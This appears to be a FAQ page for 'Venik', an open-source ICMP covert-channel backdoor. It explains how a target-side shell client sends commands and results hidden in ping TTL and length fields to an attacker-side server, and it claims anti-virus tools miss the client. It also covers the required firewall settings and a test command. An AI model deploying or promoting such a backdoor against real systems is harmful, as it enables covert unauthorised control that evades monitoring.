Page principale

Venik – Frequently Asked Questions


Q1 What does “Venik” stand for ?
A1 Venik stands for VEnik is Not another Icmp bacKdoor.
Venik is also the last word of Softwar written by Thierry Breton and Denis Beneich: “Maman m’a dit de te dire un grand secret: c’est VENIK”.

Q2 What is Venik official home page ?
A2 Venik official home page is http://www.tourdot.fr/venik.

Q3 Where can I download Venik ?
A3 You can download Venik from official home page.

Q4 Is Venik an open-source software ?
A4 Yes, Venik is an open-source software

Q5 Under which license is Venik distributed ?
A5 Venik is distributed under the Gnu General Public license version 3 (GPL). It means you can copy, redistribute, modify, aggregate or translate it in accordance with GPL.

Q6 Where can I get Venik source code ?
A6 You can download Venik source code from official home page.

Q7 In which programming language is Venik developed ?
A7 Venik is composed of a client (Venik Client) and a server (Venik Server).
Venik Client is a simple script file (Bourne Shell for Linux, batch for Windows).
The part of Venik Server I developed is fully programmed in Java but uses external libraries. All these external libraries (see APPENDIX B – Venik Server third parties) are open-source and developed in Java, except JPCAP library which is programmed in C. So Venik Server can not be considered as a full Java program because of this little piece of C code.

Q8 What is a covert channel ?
A8 « In Computer Security, a covert channel is a type of computer security attack that creates a capability to transfer information objects between processes that are not supposed to be allowed to communicate by the computer security policy » – Source Wikipedia, 2010-07-01.

Q9 Why is Venik a covert channel backdoor ?
A9 Venik is a covert channel backdoor because it allows server and clients to transfer information objects (commands, commands results, …) using legitimate flows (ICMP_ECHO_REQUEST and ICMP_ECHO_REPLY) that are not supposed to transport these kinds of information.

Q10 Is Venik a virus ?
A10 Absolutely not. Venik is not a virus. Venik client is a simple program using legitimate and basic tools provided by target operating system.

Q11 Is Venik recognized as virus by anti-viruses ?
A11 No since Venik is not a virus (see question above Is Venik a virus ?).

Q12 Why server host’s operating system must not reply incoming ICMP_ECHO_REQUEST messages ?
A12 Venik Server and Venik Client use ICMP messages to communicate. Venik Client sends ICMP_ECHO_REQUEST messages and Venik Server replies using ICMP_ECHO_REPLY messages.
Usually when computers reply to ICMP_ECHO_REQUEST messages, the processing is performed by operating system’s dedicated component: the operating system ICMP processor.
Let us imagine the two following cases (case 1 and case 2).

Case 1: Server host’s operating replies incoming ICMP_ECHO_REQUEST messages:
Step 1: Venik Client sends an ICMP_ECHO_REQUEST message to Venik Server
Step 2: Both, server host’s operating system AND Venik Server receive the ICMP_ECHO_REQUEST message
Step 3: Both, server host’s operating system AND Venik Server processe the ICMP_ECHO_REQUEST message
Step 4: Both, server host’s operating system AND Venik Server reply to Venik Client with an ICMP_ECHO_REPLY message
Step 5: Venik Client receives two ICMP_ECHO_REPLY messages, one from server host’s operating system, one from Venik server
Case 2: Server host’s operating does not reply incoming ICMP_ECHO_REQUEST messages:
Step 1: Venik Client sends an ICMP_ECHO_REQUEST message to Venik Server
Step 2: Both,
server host’s operating system AND Venik Server receive the ICMP_ECHO_REQUEST message
Step 3: Server host’s operating system does not process the incoming ICMP_ECHO_REQUEST message because it is configured to not reply 
Step 4: ICMP_ECHO_REQUEST messages. Venik Server processes the ICMP_ECHO_REQUEST message
Step 5: Venik Client receives only one outcoming ICMP_ECHO_REPLY message (from Venik Server)

Case 1: Server host’s operating replies incoming ICMP_ECHO_REQUEST messages



Case 2: Server host’s operating does not reply incoming ICMP_ECHO_REQUEST messages


Q13 How do I configure server host’s operating system not to reply incoming ICMP_ECHO_REQUEST messages ?
A13 See APPENDIX C – How to manually configure firewall ?.

Q15 How can I check if server host’s operating system does not reply incoming ICMP_ECHO_REQUEST messages ?
A15 You can use Venik Client -t option to test (-t option means test) if server host’s operating system blocks incoming ICMP_ECHO_REQUEST messages and allows outcoming ICMP_ECHO_REPLY messages.

For example, let us suppose server host’s IP address is x.x.x.x, just use the following command from Venik client :

On Linux:

>cd
>venik.sh -t x.x.x.x

On Windows:

Venik Client is currently not implemented for Windows. It will be in next release.

Notes:
You can use server host’s name (hostname) in above commands instead of server host’s IP address x.x.x.x.

To understand how does the Venik Client -t option work, see question below What is the Venik Client “t” option ?

Q16 What is the Venik Client “t” option ?
A16 The Venik Client -t option allow you to test (-t option means test) if Venik Client and Venik Server are able to communicate together.
To check if Venik Client and Venik Server are able to communicate together, Venik Client uses a 2 steps protocol.

Step 1 First Venik Client sends an ICMP_ECHO_REQUEST message to server host and wait for an ICMP_ECHO_REPLY message. In other words Venik Client checks if client host is able to ping server host. If Venik Client does not get ICMP_ECHO_REPLY message, it stops because it means Venik Client and
Venik Server are not able to communicate together.
Step 2 Then, Venik Client sends an ICMP_ECHO_REQUEST message with a specific length to server host. Venik Server is configured not to reply ICMP_ECHO_REQUEST messages with this specific length. So if Venik Client receives an ICMP_ECHO_REPLY_MESSAGE, it means it is the server host’s operating system who send the ICMP_ECHO_REPLY message and stops because Venik Client and Venik Server will not be able to communicate together (see above question Why server host’s operating system must not reply incoming ICMP_ECHO_REQUEST messages ?). If Venik Client does not receive ICMP_ECHO_REPLY message it means it is Venik Server who replied the previous ICMP_ECHO_REQUEST message (step 1), so it means Venik Client and Venik Server are able to communicate together.

Q17 Why does Venik Server support x86 and not x86-64 architectures ?
A17 Venik Server uses JPCAP, an external library, to manipulate ICMP packets. The main part of JPCAP is developed in Java (jpcap.jar), the other part is native, in other words it is developed in C. The native part of JPCAP has been built only for x86 architectures. I will build it for x86 and x86-64 architectures in next release of Venik.

Q18 Why are controlling host called “server” and controlled host called “client” ?
A18 In opposition to classical network protocols like SSH or Telnet where server is on the controlled host and client on the controlling host, Venik Server is on the controlling host and Venik Client on the controlled host. This could be a little bit confusing but it is understandable because for Venik connections are initiated by controlled hosts, that is why controlled hosts are called clients, and controlling hosts servers.

Q19 What is the only flow required between Venik Client and Venik Server ?
A19 The only flow required between attacker and target is ICMP, more precisely ICMP_ECHO_REQUEST from target to attacker and ICMP_ECHO_REPLY from attacker to taget. In other words « target only has to be able to ping attacker to be controlled ».

Q20 How do Venik Client and Venik Server communicate together ?
A20 Venik client uses the ping command provided by the target operating system to send ICMP_ECHO_REQUEST messages to Venik server and Venik server replies to Venik client using ICMP_ECHO_REPLY messages. Communication between target and attacker through ICMP messages is performed using ICMP LENGTH and ICMP TTL (Time To Live) fields. More precisely, target identification is performed using ICMP_ECHO_REQUEST LENGTH field whereas data (commands, commands results, …) are transported using ICMP_ECHO_REQUEST TTL and ICMP_ECHO_REPLY TTL fields.

Q21 Where can I find help about Venik ?
A21 Would it mean you did not find answers to your questions in this user guide ? If it is really the case, you can send me your question by mail at yann@tourdot.fr

Q22 Why do I need administrator privileges to run Venik Server ?
A22 Venik Server requires administrators privileges to capture ICMP_ECHO_REQUEST sent by clients and send ICMP_ECHO_REPLY to clients. More over you also need administrator privileges if you want Venik Server to activate and configure you firewall automatically in order to force server host’s operating system not to reply ICMP_ECHO_REQUEST (see Why server host’s operating system must not reply incoming ICMP_ECHO_REQUEST messages ?).

Q23 Why is it recommended to run Venik Server on Windows XP / Vista / Seven / 2008 Server or Linux with iptables ?
A23 Windows XP / Vista / Seven / 2008 Server have embedded firewall. Venik can automatically activate and configure Windows embedded firewall in order to in order to force server host’s operating system not to reply ICMP_ECHO_REQUEST (see Why server host’s operating system must not reply incoming ICMP_ECHO_REQUEST messages ?).
If you are running Venik Server on Linux and if firewall iptables is installed Venik can automatically activate and configure Windows embedded firewall in order to in order to force server host’s operating system not to reply ICMP_ECHO_REQUEST (see Why server host’s operating system must not reply incoming ICMP_ECHO_REQUEST messages ?).